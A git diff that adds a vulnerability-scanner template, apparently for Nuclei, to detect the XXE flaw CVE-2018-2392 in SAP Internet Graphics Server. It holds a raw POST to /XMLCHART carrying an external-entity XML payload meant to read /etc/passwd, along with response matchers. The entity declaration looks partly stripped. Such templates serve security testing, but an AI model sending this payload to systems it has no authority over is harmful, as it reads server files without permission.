diff --git a/cves/2018/CVE-2018-2392.yaml b/cves/2018/CVE-2018-2392.yaml new file mode 100644 index 0000000000..23b40cee1b --- /dev/null +++ b/cves/2018/CVE-2018-2392.yaml @@ -0,0 +1,84 @@ +id: CVE-2018-2392 + +info: + name: SAP Internet Graphics Server (IGS) XML External Entity + author: _generic_human_ + severity: high + tags: cve,cve2018,sap,igs,xxe,xmlchart + description: | + SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XXE vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. + reference: + - https://launchpad.support.sap.com/#/notes/2525222 + - https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/ + - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/ + - https://troopers.de/troopers18/agenda/3r38lr/ + - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb + +requests: + - raw: + - | + POST /XMLCHART HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary={{randstr_1}} + + --{{randstr_1}} + Content-Disposition: form-data; name="{{randstr_2}}"; filename="{{randstr_3}}.xml" + Content-Type: application/xml + + + + + ALttP + + + + 12345 + + + + --{{randstr_1}} + Content-Disposition: form-data; name="{{randstr_5}}"; filename="{{randstr_6}}.xml" + Content-Type: application/xml + + + ]> + + + + + <Extension>&xxe;</Extension> + + + + + --{{randstr_1}}-- + + # file name - /etc/passwd + + matchers-condition: and + matchers: + - type: word + words: + - "Picture" + - "Info" + - "/output/" + part: body + condition: and + + - type: word + words: + - "ImageMap" + - "Errors" + part: body + condition: or + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + - "SAP Internet Graphics Server" + part: header + condition: and